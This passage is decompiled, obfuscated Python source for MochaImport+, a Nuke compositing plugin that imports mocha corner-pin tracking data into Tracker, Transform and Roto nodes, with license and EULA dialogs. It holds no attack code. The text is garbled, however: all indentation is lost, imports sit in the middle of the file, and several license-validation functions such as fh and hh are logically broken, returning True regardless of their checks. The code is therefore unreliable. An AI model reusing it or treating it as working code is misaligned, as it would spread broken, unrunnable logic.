remainder of this Agreement shall remain in full force and effect. To the extent any express or implied restrictions are not permitted by applicable laws, these express or implied restrictions shall remain in force and effect to the maximum extent permitted by such applicable laws.</p>'
a.initUI()
def initUI(a):
aL = l.QHBoxLayout()
licenseInfoText = l.QTextEdit(a.eulaText, a)
licenseInfoText.setReadOnly(True)
aL.addWidget(licenseInfoText)
do = l.QHBoxLayout()
am = l.QLabel(
"If you agree to the above terms press 'I Accept'. Otherwise press 'Cancel' to cancel installation of the license.")
do.addWidget(am)
ci = l.QHBoxLayout()
cj = l.QPushButton('I Accept', a)
cj.setAutoDefault(False)
ck = l.QPushButton('Cancel', a)
ck.setAutoDefault(False)
ci.addWidget(cj)
ci.addWidget(ck)
F = l.QVBoxLayout()
F.addLayout(aL)
F.addLayout(do)
F.addStretch(1)
F.addLayout(ci)
cj.clicked.connect(a.accept)
ck.clicked.connect(a.reject)
a.setLayout(F)
a.setWindowTitle('End User License Agreement (EULA)')
# from PySide import QtGui as l, QtCore
from Qt import QtWidgets as l, QtCore
from Qt import QtGui as qui
class dp(object):
def __init__(a, wwqe, toolVersion, qqewrtz, qqrrtet):
a.wwqe = wwqe
a.toolVersion = toolVersion
a.wehsrhv = eR(qqewrtz, qqrrtet)
def asgg(a, quiet, wegtzeke):
if quiet:
return a.wehsrhv.fggtzh()
if a.wehsrhv.fggtzh():
return True
while True:
aa = fc(a.wwqe)
if not aa:
fd(a.wwqe, wegtzeke)
return False
if a.wehsrhv.zzdfger(aa):
dq(aa, a.wwqe)
else:
a.wehsrhv.ddsjz(aa)
h = a.wehsrhv.ertzz()
if h['status'] == 'valid':
if h['license type'] == 'BTA':
b.message('You entered a beta tester license. Beta licenses are not working with this version.')
a.wehsrhv.sddfg()
h = a.wehsrhv.ertzz()
else:
if dm():
au(True, a.wwqe)
return True
a.wehsrhv.sddfg()
else:
au(False, a.wwqe)
def abag(a):
fe = dr(a.wwqe, a.toolVersion, a.wehsrhv)
fe.exec_()
def fc(wwqe):
return b.getInput(
'No license installed for ' + wwqe + "\nEnter a valid serial number or click 'cancel' run in trial mode")
def fd(wwqe, wegtzeke):
b.message(wwqe + 'running in trial mode.\n' + wegtzeke)
def hh(aM):
if aM:
s = au(aM)
ff = False
return s
ff = True
return au(aM)
def au(aM, wwqe):
fg = fh(aM)
if fg:
b.message('Thank you for purchasing ' + wwqe)
return True
else:
b.message('License is invalid.')
return False
def fh(ds):
cl = None
if ds:
cl = 'License is invalid.'
return True
else:
if cl == 143241:
cl = 'No license installed for ' + wwqe + "\nEnter a valid serial number or click 'cancel' run in trial mode"
return ds
class dr(l.QDialog):
def __init__(a, wwqe, toolVersion, fi):
super(dr, a).__init__()
a.wwqe = wwqe
a.toolVersion = toolVersion
a.wehsrhv = fi
a.copyRightInfo = '(c) 2014 by mamoworld.com'
a.initUI()
def initUI(a):
h = a.wehsrhv.ertzz()
dt = l.QHBoxLayout()
fj = hi.getFolder() + 'about.png'
fk = qui.QPixmap(fj)
du = l.QLabel('No image available')
du.setPixmap(fk)
dt.addWidget(du)
aL = l.QHBoxLayout()
a.licenseInfoText = l.QTextEdit(a.wwqe, a)
a.licenseInfoText.setReadOnly(True)
aL.addWidget(a.licenseInfoText)
dv = l.QHBoxLayout()
a.tutorialButton = l.QPushButton('Watch In Depth Tutorial', a)
dv.addWidget(a.tutorialButton)
cm = l.QHBoxLayout()
a.rg3erw = l.QPushButton('Enter License Code', a)
a.dsfewrt = l.QPushButton('Remove License Code', a)
cm.addWidget(a.rg3erw)
cm.addWidget(a.dsfewrt)
a.hgjafd(h)
bx = l.QHBoxLayout()
cn = l.QPushButton('OK', a)
cn.setDefault(True)
bx.addStretch(0.5)
bx.addWidget(cn)
bx.addStretch(0.5)
F = l.QVBoxLayout()
F.addLayout(dt)
F.addLayout(aL)
F.addLayout(dv)
F.addLayout(cm)
F.addStretch(1)
F.addLayout(bx)
cn.clicked.connect(a.accept)
a.rg3erw.clicked.connect(a.rjrkkt)
a.dsfewrt.clicked.connect(a.ashfrtz)
a.tutorialButton.clicked.connect(a.openTutorial)
a.setGeometry(300, 300, 250, 150)
a.setLayout(F)
a.setWindowTitle(a.wwqe + ' Licenses')
def hgjafd(a, h):
a.licenseInfoText.setText(a.ghjkh(h))
if h['status'] == 'valid':
a.rg3erw.setEnabled(False)
a.dsfewrt.setEnabled(True)
else:
a.rg3erw.setEnabled(True)
a.dsfewrt.setEnabled(False)
def ghjkh(a, h):
am = a.wwqe + ' v' + a.toolVersion + '\n' + a.copyRightInfo + '\n\n'
if h['status'] == 'valid':
am += 'registered to ' + h['first name'] + ' ' + h['last name'] + '\n'
am += fl(h['license type']) + ' for ' + h['number of user licenses'] + ' user(s)'
else:
am += 'no license installed\n'
am += 'running in trial mode'
return am
def rjrkkt(a):
aa = b.getInput(
'No license installed for ' + a.wwqe + "\nEnter a valid serial number or click 'cancel' run in trial mode")
if not aa:
return
if a.wehsrhv.zzdfger(aa):
dq(aa, a.wwqe)
else:
a.wehsrhv.ddsjz(aa)
h = a.wehsrhv.ertzz()
if h['status'] == 'valid':
if h['license type'] == 'BTA':
b.message('You entered a beta tester license. Beta licenses are not working with this version.')
a.wehsrhv.sddfg()
h = a.wehsrhv.ertzz()
elif dm():
au(True, a.wwqe)
else:
a.wehsrhv.sddfg()
h = a.wehsrhv.ertzz()
else:
au(False, a.wwqe)
a.hgjafd(h)
def ashfrtz(a):
a.wehsrhv.sddfg()
h = a.wehsrhv.ertzz()
a.hgjafd(h)
def openTutorial(a):
fm.open('http://mamoworld.com/tutorial-mochaimport')
def fl(by):
if by == 'SUL':
return 'single user license'
if by == 'BTA':
return 'beta testing license'
if by == 'EDU':
return 'education license'
if by == 'REN':
return 'render only license'
return 'unknown license'
def dq(fn, wwqe):
dw = 'https://license.aescripts.com/exchange/?serial=' + fn
fo = 'You entered a temporary serial number that needs to be exchanged for a permanent license.\n\nOnce you obtain your permanent license you can use it to register ' + wwqe + '. It is quick and easy to exchange it, simply go to:\n\n' + dw + '\n\nWould you like to go there now?'
if b.ask(fo):
fm.open(dw)
def dz():
return dp('MochaImport+', '1.102', 'mochaimportnuke', '743985')
class fp(object):
"""abstract base class for corner pin data"""
def getPointValues(a, Y, x):
"""for pointIndex in 0,1,2,3 and coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
raise NotImplementedError('getPoint not implemented')
class cornerPinData___FileFormatError(Exception):
"""Invalid File Format Error"""
def __init__(a, message):
a.message = message
def __str__(a):
return repr(a.message)
class fq(fp):
def __init__(a):
a.points = [{'x': [], 'y': []}, {'x': [], 'y': []}, {'x': [], 'y': []}, {'x': [], 'y': []}]
def __str__(a):
fr = pprint.PrettyPrinter(indent=4)
return fr.pprint(a.points)
def getPointValues(a, Y, x):
assert x in ('x', 'y')
assert Y in (0, 1, 2, 3)
return a.points[Y][x]
class bz(fq):
def __init__(a, fs):
super(bz, a).__init__()
a.wegtzeke = 'In trial mode only the first 20 frames of tracking data are imported.'
a.__parseMochaNukeData(fs)
def __parseMochaNukeData(a, j):
def dA(ft):
bA = []
fu = ft.split()
dB = 1
bB = 1
for co in fu:
if co[0] == 'x':
bB = float(co[1:])
if len(bA) > 0:
fv = bA[-1][0]
dB = bB - fv
else:
value = float(co)
S = bB
bA.append((S, value))
bB += dB
return bA
def bC(fw, j):
fx = re.compile(fw + '\\s*{\\s*{\\s*curve\\s*([^}]*)}\\s*{\\s*curve\\s*([^}]*)}\\s*}')
cp = fx.search(j)
if cp == None:
raise cornerPinData___FileFormatError(
"invalid tracking data - please use corner pin data exported from mocha Pro with the format set to 'Nuke Corner Pin (*.nk)'")
fy = cp.group(1)
fz = cp.group(2)
fA = {'x': dA(fy), 'y': dA(fz)}
return fA
a.points[0] = bC('to1', j)
a.points[1] = bC('to2', j)
a.points[2] = bC('to3', j)
a.points[3] = bC('to4', j)
a.__checkDemoLimitation()
def __checkDemoLimitation(a):
cq = dz()
if not cq.asgg(quiet=False, wegtzeke=a.wegtzeke):
a.__applyDemoLimitation()
def __applyDemoLimitation(a):
fB = 15
dC = fB + 5
for bD in a.points:
bD['x'] = bD['x'][:dC]
bD['y'] = bD['y'][:dC]
class an(bz):
def __init__(a, filename):
dD = open(filename, mode='r')
j = dD.read()
dD.close()
super(an, a).__init__(j)
class ao(bz):
def __init__(a):
j = l.QApplication.clipboard().text()
super(ao, a).__init__(j)
def cornerPinNode___loadTrackingDataFromFile():
try:
filename = b.getFilename('Load NUKE corner pin data from mocha', '*.nk')
if filename == None:
return
d = an(filename)
dE(d)
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(filename, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(filename, f.message))
return
def cornerPinNode___loadTrackinDataFromClipboard():
try:
d = ao()
dE(d)
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def dE(d):
bE = b.thisNode()
dg(d, bE['pin1'], bE['pin2'], bE['pin3'], bE['pin4'])
def fC(aN, aO, aP, aQ, aR, aS, aT, aU, aV, aW, aX, aY, aZ, ba, bb, bc):
aN = float(aN)
aR = float(aR)
aV = float(aV)
aZ = float(aZ)
aP = float(aP)
aT = float(aT)
aX = float(aX)
bb = float(bb)
aO = float(aO)
aS = float(aS)
aW = float(aW)
ba = float(ba)
aQ = float(aQ)
aU = float(aU)
aY = float(aY)
bc = float(bc)
I = fD(aN, aO, aP, aQ, aR, aS, aT, aU, aV, aW, aX, aY, aZ, ba, bb, bc)
for c in range(0, 9):
I[c] = I[c] / I[8]
fE = [
I[0], I[1], 0, I[2], I[3], I[4], 0, I[5], 0, 0, 1, 0, I[6], I[7], 0, I[8]]
return fE
def hj(v):
s = str(v[0]) + ' ' + str(v[1]) + ' ' + str(v[2]) + ' ' + str(v[3]) + '\n' + str(v[4]) + ' ' + str(
v[5]) + ' ' + str(v[6]) + ' ' + str(v[7]) + '\n' + str(v[8]) + ' ' + str(v[9]) + ' ' + str(v[10]) + ' ' + str(
v[11]) + '\n' + str(v[12]) + ' ' + str(v[13]) + ' ' + str(v[14]) + ' ' + str(v[15])
return s
def dF(z, T):
G = [0] * 9
for c in range(0, 3):
for av in range(0, 3):
dG = 0
for cr in range(0, 3):
dG += z[3 * c + cr] * T[3 * cr + av]
G[3 * c + av] = dG
return G
def fF(e, A):
s = [e[0] * A[0] + e[1] * A[1] + e[2] * A[2], e[3] * A[0] + e[4] * A[1] + e[5] * A[2],
e[6] * A[0] + e[7] * A[1] + e[8] * A[2]]
return s
def dH(e):
s = [e[4] * e[8] - e[5] * e[7], e[2] * e[7] - e[1] * e[8], e[1] * e[5] - e[2] * e[4], e[5] * e[6] - e[3] * e[8],
e[0] * e[8] - e[2] * e[6], e[2] * e[3] - e[0] * e[5], e[3] * e[7] - e[4] * e[6], e[1] * e[6] - e[0] * e[7],
e[0] * e[4] - e[1] * e[3]]
return s
def dI(t, J, K, L, M, N, V, W):
e = [t, K, M, J, L, N, 1, 1, 1]
A = fF(dH(e), [V, W, 1])
s = dF(e, [A[0], 0, 0, 0, A[1], 0, 0, 0, A[2]])
return s
def fD(aN, aO, aP, aQ, aR, aS, aT, aU, aV, aW, aX, aY, aZ, ba, bb, bc):
bF = dI(aN, aO, aR, aS, aV, aW, aZ, ba)
p = dI(aP, aQ, aT, aU, aX, aY, bb, bc)
return dF(p, dH(bF))
import nuke as b
class fG(object):
"""represents keyframes for a 4x4 transform matrix"""
def __init__(a):
a.data = []
def deleteKey(a, B):
a.data = filter(lambda (cs, A): cs != B, a.data)
def setKey(a, (B, value)):
assert len(value) == 16
a.deleteKey(B)
a.data.append((B, value))
def applyToCurvesLayer(a, bd):
dJ = bd.getTransform()
ab = a._getDataAsTuples()
for c in range(0, 4):
for av in range(0, 4):
ct = dJ.getExtraMatrixAnimCurve(c, av)
ct.removeAllKeys()
for B, value in ab[4 * c + av]:
ct.addKey(B, value)
dJ.setExtraMatrixAnimCurve(c, av, ct)
def applyToArrayKnob(a, knob):
ab = a._getDataAsAnimations()
knob.setAnimated()
for c in range(0, 16):
knob.animation(c).clear()
knob.animation(c).addKey(ab[c])
def _getDataAsAnimations(a):
ab = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]
for B, value in a.data:
for c in range(0, 16):
fH = b.AnimationKey(B, value[c])
ab[c].append(fH)
return ab
def _getDataAsTuples(a):
ab = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]
for B, value in a.data:
for c in range(0, 16):
cs = (
B, value[c])
ab[c].append(cs)
return ab
def cu(d, referenceFrame):
t = d.getPointValues(0, 'x')
J = d.getPointValues(0, 'y')
K = d.getPointValues(1, 'x')
L = d.getPointValues(1, 'y')
M = d.getPointValues(2, 'x')
N = d.getPointValues(2, 'y')
V = d.getPointValues(3, 'x')
W = d.getPointValues(3, 'y')
af = fI(t, referenceFrame)
dK = fG()
if len(set([len(t), len(K), len(M), len(V), len(J), len(L), len(N), len(W)])) > 1:
raise Exception('all corners must have the same amount of keyframes')
for c in range(0, len(t)):
S = t[c][0]
if len(set([t[c][0], K[c][0], M[c][0], V[c][0], J[c][0], L[c][0], N[c][0], W[c][0]])) > 1:
raise Exception('times for keyframes of all four corners must be identical')
m = fC(t[af][1], J[af][1], t[c][1], J[c][1], K[af][1], L[af][1], K[c][1], L[c][1], M[af][1], N[af][1], M[c][1],
N[c][1], V[af][1], W[af][1], V[c][1], W[c][1])
dK.setKey((S, m))
return dK
def fI(dL, dM):
for c in range(0, len(dL)):
if dL[c][0] == dM:
return c
raise Exception("tracking data doesn't contain tracking data for frame " + str(
dM) + '.\nPlease choose another reference frame.')
import nuke as b
def fJ(dN, toNode):
""" children of fromNode become children of toNode"""
for node in dN.dependent(b.INPUTS):
for c in range(0, node.inputs()):
if node.input(c) == dN:
node.setInput(c, toNode)
def fK(dO):
"""run automatic layout on entire node graph of the group"""
dO.begin()
fL()
dO.end()
def fL():
"""run automatic layout on all nodes"""
for n in b.allNodes():
n.autoplace()
import nuke as b
def stabilizedPrecompNode___connectPrecompNodes(y, w):
ag = y.knob('name').value()
w['pin1'].setExpression(ag + '.pin1.x', 0)
w['pin1'].setExpression(ag + '.pin1.y', 1)
w['pin2'].setExpression(ag + '.pin2.x', 0)
w['pin2'].setExpression(ag + '.pin2.y', 1)
w['pin3'].setExpression(ag + '.pin3.x', 0)
w['pin3'].setExpression(ag + '.pin3.y', 1)
w['pin4'].setExpression(ag + '.pin4.x', 0)
w['pin4'].setExpression(ag + '.pin4.y', 1)
import nuke as b
import nuke as b
def be(O, fM, fN):
O.addKnob(b.Tab_Knob('mochaImport', 'MochaImport+'))
bG = b.Text_Knob('loadMochaData', 'load mocha tracking data')
bG.setFlag(b.STARTLINE)
bG.setTooltip('load mocha Nuke corner pin (*.nk) data')
bG.setValue('')
O.addKnob(bG)
fO = dP(fM)
cv = b.PyScript_Knob('loadTrackingDataFromFile', 'from file')
cv.setTooltip('import mocha corner pin data from a file\n\nrequired format: Nuke Corner Pin (*.nk)')
cv.setCommand(fO)
O.addKnob(cv)
fP = dP(fN)
cw = b.PyScript_Knob('loadTrackingDataFromClipboard', 'from clipboard')
cw.setTooltip('import mocha corner pin data from the clipboard\n\nrequired format: Nuke Corner Pin (*.nk)')
cw.setCommand(fP)
O.addKnob(cw)
def dP(dQ):
assert '\n' not in dQ
template = ' \nif not locals().has_key("mochaimport"):\n nuke.message("Please install MochaImport+ for NUKE (by mamoworld.com) to use this function")\nelse:\n {myCommand}\n'
return template.format(myCommand=dQ)
def fQ():
U = b.createNode('Tracker3')
be(U, 'mochaimport.trackerNodeMI___loadTracker3TrackingDataFromFilePopup(nuke.thisNode())',
'mochaimport.trackerNodeMI___loadTracker3TrackingDataFromClipboard(nuke.thisNode())')
U['enable1'].setValue('true')
U['enable2'].setValue('true')
U['enable3'].setValue('true')
U['enable4'].setValue('true')
U['label'].setValue('MochaImport+')
return U
def trackerNodeMI___loadTracker3TrackingDataFromFilePopup(U):
try:
k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
if k == None:
return
j = an(k)
cx(U, j)
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
return
def trackerNodeMI___loadTracker3TrackingDataFromClipboard(U):
try:
j = ao()
cx(U, j)
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cx(O, d):
bH(O['track1'], d, 0)
bH(O['track2'], d, 1)
bH(O['track3'], d, 2)
bH(O['track4'], d, 3)
def bH(bf, d, Y):
cy = Q(d.getPointValues(Y, 'x'))
cz = Q(d.getPointValues(Y, 'y'))
bf.setAnimated()
bf.animation(0).clear()
bf.animation(1).clear()
bf.animation(0).addKey(cy)
bf.animation(1).addKey(cz)
def fR():
o = b.createNode('Tracker4')
be(o, 'mochaimport.trackerNodeMI___loadTracker4TrackingDataFromFilePopup(nuke.thisNode())',
'mochaimport.trackerNodeMI___loadTracker4TrackingDataFromClipboard(nuke.thisNode())')
for _a in range(0, 4):
o['add_track'].execute()
o['label'].setValue('MochaImport+')
return o
def fS(O):
fT = fU(O)
dR = 4 - fT
if dR > 0:
for _a in range(dR):
O['add_track'].execute()
def trackerNodeMI___loadTracker4TrackingDataFromFilePopup(o):
try:
k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
if k == None:
return
j = an(k)
cA(o, j)
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
return
def trackerNodeMI___loadTracker4TrackingDataFromClipboard(o):
try:
j = ao()
cA(o, j)
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cA(o, d):
fS(o)
bI = 2
bJ = 3
fV = 6
fW = 7
fX = 8
X = 31
fY(o)
ap = o['tracks']
dS = b.ProgressTask('write tracking data')
for c in [0, 1, 2, 3]:
dS.setMessage('data for corner ' + str(c + 1))
ap.setAnimated(X * c + bI)
ap.setAnimated(X * c + bJ)
cy = d.getPointValues(c, 'x')
cz = d.getPointValues(c, 'y')
for B, cB in cy:
ap.setValueAt(cB, B, X * c + bI)
for B, cC in cz:
ap.setValueAt(cC, B, X * c + bJ)
ap.setValue(1, X * c + fV)
ap.setValue(1, X * c + fW)
ap.setValue(1, X * c + fX)
dS.setProgress(c * 25)
def fY(o):
bI = 2
bJ = 3
X = 31
for c in [0, 1, 2, 3]:
o['tracks'].clearAnimated(X * c + bI)
o['tracks'].clearAnimated(X * c + bJ)
def fZ(o):
cr = o['tracks']
bF = o['tracks'].toScript().split(' \n} \n{ \n ')
bF.pop(0)
bg = str(bF)[2:].split('\\n')
if bg:
bg.pop(-1)
if bg:
bg.pop(-1)
dT = []
for c in bg:
dT.append(c.split('"')[1])
return dT
def fU(o):
s = len(fZ(o))
return s
import nuke as b
import pprint
import nuke as b
import math as H
def ga(bK, bL, bM, bN, bO, bP):
C = bK[0]
D = bK[1]
aw = bL[0]
ax = bL[1]
ay = bM[0]
az = bM[1]
bh = bN[0]
bi = bN[1]
dU = bO[0]
dV = bO[1]
dW = bP[0]
dX = bP[1]
dY = ((bh - dU) * (D - az) - (bh - dW) * (D - ax)) / ((C - aw) * (D - az) - (C - ay) * (D - ax))
dZ = ((bh - dU) * (C - ay) - (bh - dW) * (C - aw)) / ((D - ax) * (C - ay) - (D - az) * (C - aw))
gb = bh - dY * C - dZ * D
ea = ((bi - dV) * (D - az) - (bi - dX) * (D - ax)) / ((C - aw) * (D - az) - (C - ay) * (D - ax))
eb = ((bi - dV) * (C - ay) - (bi - dX) * (C - aw)) / ((D - ax) * (C - ay) - (D - az) * (C - aw))
gd = bi - ea * C - eb * D
m = (dY, dZ, gb, ea, eb, gd)
return m
def ge(m):
z = m[0]
T = m[1]
ac = m[2]
G = m[3]
p = m[4]
aJ = m[5]
if z * p < 0:
if z < 0:
bQ = 1
z = -z
T = -T
else:
bQ = 2
p = -p
G = -G
else:
bQ = 0
bR = H.atan2(-T, z)
bS = H.atan2(G, p)
if abs(bR) < abs(bS):
aA = bR
cD = 0
cE = bS - bR
bT = H.sqrt(z * z + T * T)
bU = p / (H.cos(aA) - H.sin(aA) * H.tan(cE))
else:
aA = bS
cE = 0
cD = bS - bR
bU = H.sqrt(p * p + G * G)
bT = z / (H.cos(aA) + H.sin(aA) * H.tan(cD))
if 1 == bQ:
bT = -bT
if 2 == bQ:
bU = -bU
s = {'translation': (ac, aJ), 'rotation': aA, 'shear': (cD, cE), 'scale': (bT, bU)}
return s
def hk(m):
return (
m[2], m[5])
def hl(m):
G = m[3]
p = m[4]
aB = H.atan(G / p)
return aB
def hm(m):
z = m[0]
T = m[1]
G = m[3]
p = m[4]
bj = H.sqrt(z * z + T * T)
bk = H.sqrt(G * G + p * p)
if z < 0:
bj = bj * -1
if T < 0:
bk = bk * -1
return (bj, bk)
import math as H
class gf(object):
"""abstract base class for transform data"""
def hasPositionData(a):
raise NotImplementedError('hasPositionData not implemented')
def hasScaleData(a):
raise NotImplementedError('hasScaleData not implemented')
def hasRotationData(a):
raise NotImplementedError('hasRotationData not implemented')
def hasShearData(a):
raise NotImplementedError('hasShearData not implemented')
def getPositionValues(a, x):
"""for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
raise NotImplementedError('getPositionValues not implemented')
def getScaleValues(a, x):
"""for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
raise NotImplementedError('getScaleValues not implemented')
def getRotationValues(a):
"""returns a list of (frame,value) tuples"""
raise NotImplementedError('getRotationValues not implemented')
def getShearValues(a, x):
"""for coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
raise NotImplementedError('getShearValues not implemented')
class gg(gf):
"""transform data that represents position, scale rotation and shear as a dictionary of lists"""
def __init__(a):
a.data = {'position': {'x': [], 'y': []}, 'rotation': [], 'scale': {'x': [], 'y': []},
'shear': {'x': [], 'y': []}}
def hasPositionData(a):
bl = len(a.data['position']['x']) > 0
bm = len(a.data['position']['y']) > 0
return bl or bm
def hasScaleData(a):
bl = len(a.data['scale']['x']) > 0
bm = len(a.data['scale']['y']) > 0
return bl or bm
def hasRotationData(a):
gh = len(a.data['rotation']) > 0
return gh
def hasShearData(a):
bl = len(a.data['shear']['x']) > 0
bm = len(a.data['shear']['y']) > 0
return bl or bm
def getPositionValues(a, x):
assert x in ('x', 'y')
return a.data['position'][x]
def getScaleValues(a, x):
assert x in ('x', 'y')
return a.data['scale'][x]
def getRotationValues(a):
return a.data['rotation']
def getShearValues(a, x):
assert x in ('x', 'y')
return a.data['shear'][x]
class bV(gg):
"""transform data that is obtained by converting corner pin data"""
def __init__(a, d):
super(bV, a).__init__()
a.__importCpData(d)
def __importCpData(a, d):
t = d.getPointValues(0, 'x')
J = d.getPointValues(0, 'y')
K = d.getPointValues(1, 'x')
L = d.getPointValues(1, 'y')
M = d.getPointValues(2, 'x')
N = d.getPointValues(2, 'y')
V = d.getPointValues(3, 'x')
W = d.getPointValues(3, 'y')
if len(set([len(t), len(K), len(M), len(V), len(J), len(L), len(N), len(W)])) > 1:
raise Exception('all corners must have the same amount of keyframes')
bW = []
ec = []
aB = []
ed = []
ee = []
ef = []
eg = []
for c in range(0, len(t)):
S = t[c][0]
if len(set([t[c][0], K[c][0], M[c][0], V[c][0], J[c][0], L[c][0], N[c][0], W[c][0]])) > 1:
raise Exception('times for keyframes of all four corners must be identical')
cB = (t[c][1] + K[c][1] + M[c][1] + V[c][1]) / 4
cC = (J[c][1] + L[c][1] + N[c][1] + W[c][1]) / 4
bW.append((S, cB))
ec.append((S, cC))
ah = 0
aC = bW[ah][1]
aD = bW[ah][1]
bK = [t[ah][1] - aC, J[ah][1] - aD]
bL = [K[ah][1] - aC, L[ah][1] - aD]
bM = [M[ah][1] - aC, N[ah][1] - aD]
bN = [t[c][1] - aC, J[c][1] - aD]
bO = [K[c][1] - aC, L[c][1] - aD]
bP = [M[c][1] - aC, N[c][1] - aD]
gi = ga(bK, bL, bM, bN, bO, bP)
bn = ge(gi)
ed.append((S, bn['scale'][0]))
ee.append((S, bn['scale'][1]))
aB.append((S, H.degrees(bn['rotation'])))
ef.append((S, bn['shear'][0]))
eg.append((S, bn['shear'][1]))
a.data['position']['x'] = bW
a.data['position']['y'] = ec
a.data['scale']['x'] = ed
a.data['scale']['y'] = ee
a.data['rotation'] = aB
a.data['shear']['x'] = ef
a.data['shear']['y'] = eg
import pprint
class cF(Exception):
def __init__(a):
a.message = 'Please choose at least one type of data that you want to import.'
def gj():
g = b.createNode('Transform')
be(g, 'mochaimport.transformNodeMI___loadTransformTrackingDataFromFilePopup(nuke.thisNode())',
'mochaimport.transformNodeMI___loadTransformTrackingDataFromClipboard(nuke.thisNode())')
for cG in ['translate', 'rotate', 'scale', 'skew']:
gk(cG, g)
g['label'].setValue('MochaImport+')
def gk(name, node):
knob = b.Boolean_Knob('import' + name + 'data', 'import ' + name + ' data')
knob.setTooltip('whether loading the mocha data generates keyframes for ' + name)
knob.setValue(True)
knob.setFlag(b.STARTLINE)
node.addKnob(knob)
def transformNodeMI___loadTransformTrackingDataFromFilePopup(g):
try:
eh(g)
k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
if k == None:
return
d = an(k)
u = bV(d)
cH(g, u)
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
except cF as f:
b.message(f.message)
return
def transformNodeMI___loadTransformTrackingDataFromClipboard(g):
try:
eh(g)
d = ao()
u = bV(d)
cH(g, u)
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
except cF as f:
b.message(f.message)
def eh(g):
for cG in ['translate', 'rotate', 'scale', 'skew']:
if g['import' + cG + 'data'].getValue():
return
raise cF()
def cH(g, u):
if u.hasPositionData() and g['importtranslatedata'].getValue():
gl = Q(u.getPositionValues('x'))
gm = Q(u.getPositionValues('y'))
g['translate'].clearAnimated()
g['translate'].setAnimated()
g['translate'].animation(0).addKey(gl)
g['translate'].animation(1).addKey(gm)
if u.hasScaleData() and g['importscaledata'].getValue():
bj = Q(u.getScaleValues('x'))
bk = Q(u.getScaleValues('y'))
g['scale'].clearAnimated()
g['scale'].setAnimated()
g['scale'].setValue(1, 1)
g['scale'].animation(0).addKey(bj)
g['scale'].animation(1).addKey(bk)
if u.hasRotationData() and g['importrotatedata'].getValue():
aB = Q(u.getRotationValues())
g['rotate'].clearAnimated()
g['rotate'].setAnimated()
g['rotate'].animation(0).addKey(aB)
if u.hasShearData() and g['importskewdata'].getValue():
gn = Q(u.getShearValues('x'))
go = Q(u.getShearValues('y'))
g['skewX'].clearAnimated()
g['skewX'].setAnimated()
g['skewX'].animation(0).addKey(gn)
g['skewY'].clearAnimated()
g['skewY'].setAnimated()
g['skewY'].animation(0).addKey(go)
g['center'].clearAnimated()
g['center'].setAnimated()
g['center'].animation(0).setKey(0, 0)
g['center'].animation(1).setKey(0, 0)
import nukescripts
import random
import nuke as b
import nuke.rotopaint as gp
import nuke as b
import nuke.rotopaint as gp
def cI(bo):
return ei(bo.rootLayer, [bo.rootLayer])
def ei(bd, list):
for c in bd:
ac = c.getAttributes()
if isinstance(c, b.rotopaint.Shape):
list.append(c)
if isinstance(c, b.rotopaint.Stroke):
list.append(c)
if isinstance(c, b.rotopaint.Layer):
list.append(c)
ei(c, list)
return list
def ej(gq):
return map(lambda ac: ac.name, gq)
def gr():
return cJ('RotoPaint')
def gs():
return cJ('Roto')
def gt():
return cJ('SplineWarp3')
def cJ(gu):
E = b.createNode(gu)
be(E, 'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFilePopup(nuke.thisNode())',
'mochaimport.RotoPaintNodeMI___loadTransformMatrixFromFromClipboard(nuke.thisNode())')
cK = cI(E['curves'])
cL = ej(cK)
ek = b.Enumeration_Knob('trackingDataLayerMI', 'apply to layer', cL)
ek.setTooltip('choose here to which layer the tracking data should be applied.')
E.addKnob(ek)
el(E)
E['label'].setValue('MochaImport+')
return E
def RotoPaintNodeMI___loadTransformMatrixFromFilePopup(E):
try:
k = b.getFilename('Load Nuke Corner Pin Data from mocha', '*.nk')
if k == None:
return
j = an(k)
cM(E, j)
except IOError as f:
b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(k, f.errno, f.strerror))
except cornerPinData___FileFormatError as f:
b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(k, f.message))
return
def RotoPaintNodeMI___loadTransformMatrixFromFromClipboard(E):
try:
j = ao()
cM(E, j)
except cornerPinData___FileFormatError as f:
b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def cM(E, d, cN=None, referenceFrame=None):
bo = E['curves']
if cN == None:
cN = int(E['trackingDataLayerMI'].getValue())
gv = cI(bo)
bd = gv[cN]
if referenceFrame == None:
referenceFrame = em(E)
bp = cu(d, referenceFrame)
bp.applyToCurvesLayer(bd)
bo.changed()
return
def em(node):
if node['useCurrentFrameAsReferenceFrame'].getValue():
return int(b.frame())
else:
return int(node['referenceFrameMI'].getValue())
def el(node):
bq = b.Array_Knob('referenceFrameMI', 'reference frame')
bq.setTooltip('at this frame, the shapes will preserve their position when the tracking data is loaded.')
node.addKnob(bq)
aE = b.Boolean_Knob('useCurrentFrameAsReferenceFrame', 'use current frame')
